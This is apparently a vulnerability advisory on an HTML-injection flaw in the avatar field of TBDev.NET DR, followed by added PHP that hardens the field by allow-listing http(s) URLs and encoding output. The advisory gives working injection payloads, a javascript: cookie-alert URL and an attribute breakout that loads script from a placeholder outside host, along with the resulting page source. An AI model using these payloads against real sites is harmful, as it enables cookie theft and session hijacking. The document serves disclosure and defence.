source: https://www.securityfocus.com/bid/24923/info

TBDev.NET DR is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input data.

Exploiting this issue may allow an attacker to execute HTML and script code in the context of the affected site, to steal cookie-based authentication credentials, or to control how the site is rendered to the user; other attacks are also possible.

TBDev.NET DR 010306 and prior versions are vulnerable.

version 11-10-05-BETA-SF1:111005 <=

$avatar = $_POST["avatar"];

where

$_POST["avatar"]=javascript:alert(document.cookie);
or
$_POST["avatar"]="><script src=http://urlmaliciousJavaScript></script><";

-> last version <= 010306
$_POST["avatar"]=javascript:alert(document.cookie);

go to
http://torrentvictim/userdetails.php?id=malicioususerprofileid
the source code is:
...<tr><td class=rowhead>Avatar</td><td align=left><img src="\"><script src=http://urlmaliciousJavaScript><script><\""></td></tr>...

or

...<tr><td class=rowhead>Avatar</td><td align=left><img src="javascript:alert(document.cookie);"></td></tr>...
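
Hardened handling of the avatar field, as an added example that is not TBDev.NET's own code: the value is allow-listed to http(s) URLs when accepted and HTML-encoded when written into the img tag. The function names clean_avatar_url and avatar_row, the 255-byte limit and the sample host img.example.org are assumptions made for illustration.

```php
<?php
// Added example, not TBDev.NET code: function names are hypothetical.

/** Return the avatar URL if it is an acceptable http(s) URL, or null if rejected. */
function clean_avatar_url(string $raw): ?string
{
    $url = trim($raw);
    // Reject empty or oversized input, and any value carrying quotes, angle
    // brackets, backslashes, whitespace or control characters.
    if ($url === '' || strlen($url) > 255 || preg_match('/[\x00-\x20\x7f"\'<>\\\\]/', $url)) {
        return null;
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;
    }
    // Allow-list the scheme; this is what stops javascript: and data: URLs.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;
    }
    return $url;
}

/** Build the avatar table row, encoding the value for an HTML attribute. */
function avatar_row(?string $url): string
{
    if ($url === null) {
        return '<tr><td class="rowhead">Avatar</td><td align="left">(none)</td></tr>';
    }
    // ENT_QUOTES encodes both quote styles, so the value cannot close src="...".
    $attr = htmlspecialchars($url, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<tr><td class="rowhead">Avatar</td><td align="left"><img src="' . $attr . '"></td></tr>';
}

// Constructed sample inputs: the two payload shapes from the advisory plus a normal URL.
$samples = [
    'javascript:alert(document.cookie);',
    '"><script src=http://urlmaliciousJavaScript></script><"',
    'https://img.example.org/avatars/42.png',
];
foreach ($samples as $s) {
    $clean = clean_avatar_url($s);
    printf("%-60s => %s\n", $s, $clean === null ? 'REJECTED' : avatar_row($clean));
}
```

Running the check again at render time in userdetails.php, not only when the profile is saved, also covers avatar values that were stored before the validation existed.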